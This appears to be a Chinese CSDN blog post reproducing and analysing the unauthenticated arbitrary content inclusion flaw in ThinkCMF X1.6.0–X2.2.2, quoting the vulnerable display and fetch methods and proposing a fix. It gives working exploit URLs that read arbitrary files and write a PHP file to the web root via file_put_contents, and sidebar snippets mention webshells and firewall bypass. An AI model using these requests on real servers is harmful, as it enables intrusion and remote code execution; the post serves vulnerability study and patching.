ThinkCMF框架上的任意内容包含漏洞复现+分析

最新推荐文章于 2024-04-12 03:15:05 发布
最新推荐文章于 2024-04-12 03:15:05 发布
阅读量776 收藏
点赞数
分类专栏: 漏洞复现 文章标签: ThinkCMF 任意文件包含 任意内容包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/102917140
版权

漏洞名称: ThinkCMF框架上的任意内容包含漏洞

漏洞危害: 远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码

漏洞影响:

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

复现过程:

url/?a=display&templateFile=README.md

在这里插入图片描述

url?a=fetch&templateFile=public/index&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

空白页面

url/test.php

在这里插入图片描述

漏洞分析:
实际上此漏洞的产生的原因是:
thinkcmf是给予tinkphp再开发的,他有一些thinkphp的特性,例如可以通过g\m\a参数指定分组\控制器\方法,这里可以通过a参数直接调用Portal\IndexController父类(HomebaseController)中的一些权限为public的方法。
而display和fetch函数的修饰符为公有
进入index.php
在这里插入图片描述找到项目路径为application
进入入口分组的控制器类(即:application\Portal\Controller)
IndexController.class.php
在这里插入图片描述此类文件里面只有一个display函数,跟进display函数,打开父类HomebaseController
在这里插入图片描述漏洞发生在display函数和fetch函数
首先是display函数:

	/**
	 * 加载模板和页面输出 可以返回输出内容
	 * @access public
	 * @param string $templateFile 模板文件名
	 * @param string $charset 模板输出字符集
	 * @param string $contentType 输出类型
	 * @param string $content 模板输出内容
	 * @return mixed
	 */
	public function display($templateFile = '', $charset = '', $contentType = '', $content = '', $prefix = '') {
		parent::display($this->parseTemplate($templateFile), $charset, $contentType,$content,$prefix);
	}

此函数的作用是显示模块,参数可选
这里没有对传入的文件名做任何过滤,已经存在了文件包含
直接可用index.php?a=display&templateFile=文件名
就已经能读任意文件了
fetch函数:

	/**
	 * 获取输出页面内容
	 * 调用内置的模板引擎fetch方法,
	 * @access protected
	 * @param string $templateFile 指定要调用的模板文件
	 * 默认为空 由系统自动定位模板文件
	 * @param string $content 模板输出内容
	 * @param string $prefix 模板缓存前缀*
	 * @return string
	 */
	public function fetch($templateFile='',$content='',$prefix=''){
	    $templateFile = empty($content)?$this->parseTemplate($templateFile):'';
		return parent::fetch($templateFile,$content,$prefix);
	}

由于thinkcmf基于thinkphp,而thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入(对于模板注入的理解可参见:https://www.jianshu.com/p/aef2ae0498df)
并且fetch函数参数也是可选的,这里注意templateFile参数不可选,不然会返回空,若templateFile=public/index,(对于public/index,之后再补充)则我们传入的文件在网站根目录
所以我们可以直接构造:

?a=fetch&templateFile=public/index&content=<?php file_put_contents("shell.php","<?php phpinfo();?>");?>

执行完成之后是一片空白,直接访问url/shell.php便能得到php配置信息

修复方案:
将漏洞发生的两个函数display和fetch两个函数修饰符改为protect

ring4ring
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2131
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 858
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1484
【thinkcmf-文件包含】public函数
漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现
wwl012345的博客
11-29 2781
0x00 简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。 0x01 漏洞介绍 攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。 0...
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 626
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞
基于PHP和ThinkPHP的开源内容管理框架ThinkCMF设计源码
最新发布
04-14
ThinkCMF是一个先进的开源内容管理框架,它基于PHP语言和ThinkPHP框架开发,同时兼容PHP-FPM和Swoole双模式,旨在提升WEB开发的效率。该框架包含1658个PHP文件、173个JavaScript文件、164个HTML文件等,总共2788个...
ThinkCMF内容管理框架- ThinkPHP框架
04-16
ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过...
ThinkCMF内容管理框架 5.0.170927.zip
06-08
ThinkCMF内容管理框架 5.0.170927.zip
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1191
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1053
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 246
?>’)/shell.php?>’)
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2008
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1369
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
2020-09-16
ao52426055的博客
09-16 121
在连接后面写入一个一句话木马 ?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’) //生成test.php 文件内容为 <?php phpinfo(); ?> 当我们访问 /test.php 执行<?php phpinfo(); ?> 输出phpinfo() 创建自己的webshell 1..
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1596
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmf模版
07-28
ThinkCMF模版是用于ThinkCMF框架的一种前端模版,可以用于定制网站的外观和功能。根据引用\[1\],在安装模块时,需要将模版文件夹放置在正确的位置,通常是在public/themes目录下。模版文件夹中应包含一个manifest....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值